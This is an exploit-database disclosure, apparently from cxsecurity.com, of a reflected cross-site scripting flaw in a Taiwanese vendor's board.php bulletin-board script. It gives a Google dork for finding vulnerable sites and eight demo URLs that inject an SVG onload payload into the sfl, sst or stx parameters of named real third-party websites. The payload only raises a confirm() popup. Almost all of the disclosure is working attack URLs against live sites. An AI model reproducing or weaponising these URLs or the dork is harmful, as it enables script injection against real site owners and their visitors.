Design By 種籽網頁設計 Cross Site Scripting

2015.12.28
Credit: Persian Hack Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: site:.tw inurl:board.php? stx=

###################### # Exploit Title : Design By 種籽網頁設計 Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.e-seed.com.tw/ # Google Dork : site:.tw inurl:board.php? stx= # Date: 2015/12/28 ###################### # # Demo: # #http://www.sun-wang.com.tw/bbs/board.php?bo_table=news&page=2&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://www.spaceframeal.com.tw/bbs/board.php?bo_table=service&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://www.shootingsport.org.tw/bbs/board.php?bo_table=fire&sst=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://yoli.com.tw/bbs/board.php?bo_table=qa&wr_id=7&sfl=&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://e-wewe.com.tw/bbs/board.php?bo_table=faq&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://www.sushionly.com.tw/bbs/board.php?bo_table=menu&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team #http://lovinghut.com.tw/portal/tw/bbs/board.php?bo_table=menu_tw_en&sfl=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Teamwr_link1&stx=8&lang=_en&m=ct #http://www.rtr-tech.com.tw/bbs/board.php?bo_table=news_en&stx=%27%3EPersian%3Csvg/onload=confirm%28/MobhaM/%29%3EHack%20Team # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top